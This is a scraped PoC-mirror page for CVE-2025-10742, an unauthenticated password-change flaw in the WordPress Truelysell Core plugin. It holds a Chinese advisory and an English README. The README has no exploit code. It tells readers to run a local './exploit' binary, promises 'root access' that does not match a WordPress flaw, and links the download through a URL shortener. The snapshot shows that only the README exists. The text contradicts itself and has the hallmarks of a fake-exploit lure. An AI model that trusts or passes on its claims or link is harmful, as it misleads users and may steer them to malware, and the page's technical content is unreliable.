Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-10742 PoC — WordPress plugin Truelysell Core 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin Truelysell Core 安全漏洞 (CVE-2025-10742)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Truelysell Core 1.8.6及之前版本存在安全漏洞,该漏洞源于提供用户控制的对象访问,可能导致绕过授权和访问系统资源,允许未经验证的攻击者更改用户密码并接管管理员账户。
Readme
# CVE-2025-10742

## Overview

The Truelysell Core plugin for WordPress introduces a security flaw that allows unauthorized users to change passwords of existing accounts

## Vulnerability Details

This vulnerability arises from insufficient access controls, enabling attackers to exploit the 'truelysell_edit_staff' shortcode without authentication. Consequently, unauthenticated individuals can manipulate user passwords, which poses a significant risk of unauthorized account access, including the potential compromise of administrator privileges. Website owners using affected plugin versions are urged to implement security measures and update to the latest version to safeguard their systems.

### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low


Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.


### Important Note

Use this exploit responsibly and only on systems you own or have explicit permission to test.

## Example

Here is a simple example of how to use the exploit:

1. Open your terminal.
2. Run the exploit:

   ```bash
   ./exploit
   ```

3. If successful, you will see a message indicating that you have gained root access.

### Download [here](https://tinyurl.com/2w2ktfmd)
File Snapshot

[4.0K] /data/pocs/8dc9f2f2485c475073d6cc26c5020e86187545c5 └── [1.4K] README.md 1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.